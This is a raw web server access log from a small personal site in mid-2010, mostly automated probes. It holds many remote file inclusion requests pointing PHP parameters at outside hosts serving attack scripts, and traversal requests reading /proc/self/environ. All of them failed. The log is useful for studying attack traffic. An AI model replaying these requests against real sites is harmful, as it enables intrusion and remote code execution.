77.221.130.25 - - [31/May/2010:23:27:53 -0500] "GET /logs/access_log.1271548800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:23:27:54 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
207.46.199.39 - - [31/May/2010:23:28:56 -0500] "GET /logs/access_log.1170460800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.144 - - [31/May/2010:23:29:25 -0500] "GET /logs/access_log.1246147200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [31/May/2010:23:30:05 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
74.55.43.66 - - [31/May/2010:23:32:14 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:23:32:14 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.195.112.180 - - [31/May/2010:23:32:26 -0500] "GET /logs/access_log.1170720000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.211.18.156 - - [31/May/2010:23:32:41 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:23:32:41 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
83.170.107.145 - - [31/May/2010:23:32:49 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
83.170.107.145 - - [31/May/2010:23:32:49 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
121.88.4.141 - - [31/May/2010:23:34:19 -0500] "GET //skin/daerew_45galleryGD/setup.php?dir=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.88.4.141 - - [31/May/2010:23:34:19 -0500] "GET /logs//skin/daerew_45galleryGD/setup.php?dir=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.88.4.141 - - [31/May/2010:23:34:22 -0500] "GET /logs/access_log.1272153600//skin/daerew_45galleryGD/setup.php?dir=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
189.11.252.155 - - [31/May/2010:23:34:55 -0500] "GET //components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.ownzcorp.hdfree.com.br/id.jpg? HTTP/1.1" 404 334 "-""libwww-perl/5.817"
189.11.252.155 - - [31/May/2010:23:34:56 -0500] "GET /logs//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.ownzcorp.hdfree.com.br/id.jpg? HTTP/1.1" 404 339 "-""libwww-perl/5.817"
64.251.10.117 - - [31/May/2010:23:35:14 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.251.10.117 - - [31/May/2010:23:35:14 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
121.88.4.141 - - [31/May/2010:23:36:07 -0500] "GET //skin/daerew_45galleryGD/setup.php?dir=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.88.4.141 - - [31/May/2010:23:36:07 -0500] "GET /logs//skin/daerew_45galleryGD/setup.php?dir=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.88.4.141 - - [31/May/2010:23:36:09 -0500] "GET /logs/access_log.1272153600//skin/daerew_45galleryGD/setup.php?dir=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
87.250.255.243 - - [31/May/2010:23:38:07 -0500] "GET /logs/access_log.1263945600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.49.71.250 - - [31/May/2010:23:38:28 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=en&start=10&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash%26um%3D1%26hl%3Den%26client%3Dsafari%26sa%3DG%26rls%3Den%26tbs%3Disch:1""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
67.49.71.250 - - [31/May/2010:23:38:29 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
67.49.71.250 - - [31/May/2010:23:38:29 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
67.49.71.250 - - [31/May/2010:23:38:29 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
67.49.71.250 - - [31/May/2010:23:38:29 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
67.49.71.250 - - [31/May/2010:23:38:29 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
114.108.177.125 - - [31/May/2010:23:38:44 -0500] "GET /index2.php?ascii_seite=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:23:38:45 -0500] "GET /logs/index2.php?ascii_seite=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:23:38:45 -0500] "GET /logs/access_log.1272499200/index2.php?ascii_seite=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:23:38:46 -0500] "GET /logs/access_log.1271548800/index2.php?ascii_seite=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
118.129.166.213 - - [31/May/2010:23:44:07 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
118.129.166.213 - - [31/May/2010:23:46:19 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
122.112.32.51 - - [31/May/2010:23:47:47 -0500] "GET /logs/access_log.1271548800//agendax/addevent.inc.php?agendax_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
122.112.32.51 - - [31/May/2010:23:47:47 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
122.112.32.51 - - [31/May/2010:23:47:47 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
209.44.120.2 - - [31/May/2010:23:49:41 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.221.130.25 - - [31/May/2010:23:51:14 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:23:51:14 -0500] "GET /logs/access_log.1273622400%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:23:51:14 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:23:51:23 -0500] "GET /logs/access_log.1273622400%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:23:51:23 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:23:51:23 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:23:51:26 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 341 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:23:51:29 -0500] "GET /logs/access_log.1273363200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 365 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:23:51:30 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.46.13.40 - - [31/May/2010:23:52:56 -0500] "GET /logs/access_log.1201219200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.55 - - [31/May/2010:23:53:25 -0500] "GET /logs/access_log.1223510400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.238.145.196 - - [31/May/2010:23:54:20 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 336 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:23:54:20 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 341 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:23:54:20 -0500] "GET /logs/access_log.1273363200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 363 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:23:55:53 -0500] "GET /logs/access_log.1273363200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 365 "-""Mozilla/5.0"
207.46.13.92 - - [31/May/2010:23:56:55 -0500] "GET /logs/access_log.1197072000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.238.145.196 - - [31/May/2010:23:57:34 -0500] "GET /logs/access_log.1274313600%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 365 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:23:58:28 -0500] "GET /logs/access_log.1273363200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 363 "-""Mozilla/5.0"
209.44.120.2 - - [31/May/2010:23:59:23 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.44.120.2 - - [31/May/2010:23:59:23 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.44.120.2 - - [31/May/2010:23:59:23 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.44.120.2 - - [31/May/2010:23:59:35 -0500] "GET /logs/access_log.1273017600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.238.145.196 - - [01/Jun/2010:00:00:50 -0500] "GET /logs/access_log.1272412800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 363 "-""Mozilla/5.0"
89.238.145.196 - - [01/Jun/2010:00:01:02 -0500] "GET /logs/access_log.1274313600%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 365 "-""Mozilla/5.0"
207.46.204.235 - - [01/Jun/2010:00:03:25 -0500] "GET /logs/access_log.1194048000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [01/Jun/2010:00:03:51 -0500] "GET /logs/access_log.1271203200 HTTP/1.0" 200 497444 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.18.141.114 - - [01/Jun/2010:00:04:50 -0500] "GET //init.inc.php?CPG_M_DIR=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.18.141.114 - - [01/Jun/2010:00:04:50 -0500] "GET /logs//init.inc.php?CPG_M_DIR=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
67.18.141.114 - - [01/Jun/2010:00:04:52 -0500] "GET /logs/access_log.1271548800//init.inc.php?CPG_M_DIR=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
64.79.194.247 - - [01/Jun/2010:00:05:42 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://h1.ripway.com/bezad/idx? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
64.79.194.247 - - [01/Jun/2010:00:05:42 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://h1.ripway.com/bezad/idx? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
120.50.40.133 - - [01/Jun/2010:00:06:04 -0500] "GET //index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [01/Jun/2010:00:06:04 -0500] "GET //index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
89.238.145.196 - - [01/Jun/2010:00:08:10 -0500] "GET /logs/access_log.1272412800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 363 "-""Mozilla/5.0"
208.115.111.248 - - [01/Jun/2010:00:11:57 -0500] "GET /logs/access_log.1259798400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jun/2010:00:11:59 -0500] "GET /logs/access_log.1260057600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jun/2010:00:12:01 -0500] "GET /logs/access_log.1260144000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jun/2010:00:12:03 -0500] "GET /logs/access_log.1260662400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jun/2010:00:12:06 -0500] "GET /logs/access_log.1260921600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jun/2010:00:12:08 -0500] "GET /logs/access_log.1261094400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jun/2010:00:12:11 -0500] "GET /logs/access_log.1261526400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jun/2010:00:12:13 -0500] "GET /logs/access_log.1261958400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jun/2010:00:12:16 -0500] "GET /logs/access_log.1262217600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jun/2010:00:12:18 -0500] "GET /logs/access_log.1262736000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [01/Jun/2010:00:12:21 -0500] "GET /logs/access_log.1274659200 HTTP/1.1" 200 983818 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.47 - - [01/Jun/2010:00:12:25 -0500] "GET /logs/access_log.1166140800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.43 - - [01/Jun/2010:00:13:47 -0500] "GET /logs/access_log.1264118400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
118.129.166.213 - - [01/Jun/2010:00:14:33 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
209.44.120.2 - - [01/Jun/2010:00:15:26 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.44.120.2 - - [01/Jun/2010:00:15:26 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.44.120.2 - - [01/Jun/2010:00:15:26 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
118.129.166.213 - - [01/Jun/2010:00:15:38 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:00:15:39 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:00:15:39 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.79"
209.44.120.2 - - [01/Jun/2010:00:15:40 -0500] "GET /logs/access_log.1273017600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
207.46.199.54 - - [01/Jun/2010:00:15:55 -0500] "GET /logs/access_log.1212537600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.189 - - [01/Jun/2010:00:16:25 -0500] "GET /logs/access_log.1212192000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.44.120.2 - - [01/Jun/2010:00:17:28 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.44.120.2 - - [01/Jun/2010:00:17:28 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.44.120.2 - - [01/Jun/2010:00:18:03 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.44.120.2 - - [01/Jun/2010:00:18:03 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.18.141.114 - - [01/Jun/2010:00:20:29 -0500] "GET /logs//skin/daerew_45galleryGD/setup.php?dir=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.18.141.114 - - [01/Jun/2010:00:20:29 -0500] "GET /logs/access_log.1272153600//skin/daerew_45galleryGD/setup.php?dir=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.18.141.114 - - [01/Jun/2010:00:20:38 -0500] "GET //skin/daerew_45galleryGD/setup.php?dir=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
118.129.166.213 - - [01/Jun/2010:00:20:50 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.79"
64.79.194.247 - - [01/Jun/2010:00:21:57 -0500] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://h1.ripway.com/bezad/idx? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
64.79.194.247 - - [01/Jun/2010:00:21:57 -0500] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://h1.ripway.com/bezad/idx? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
118.129.166.213 - - [01/Jun/2010:00:26:59 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:00:26:59 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:00:27:00 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:00:28:53 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.79"
208.110.132.7 - - [01/Jun/2010:00:32:24 -0500] "GET /logs/access_log.1262649600//modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:00:32:24 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
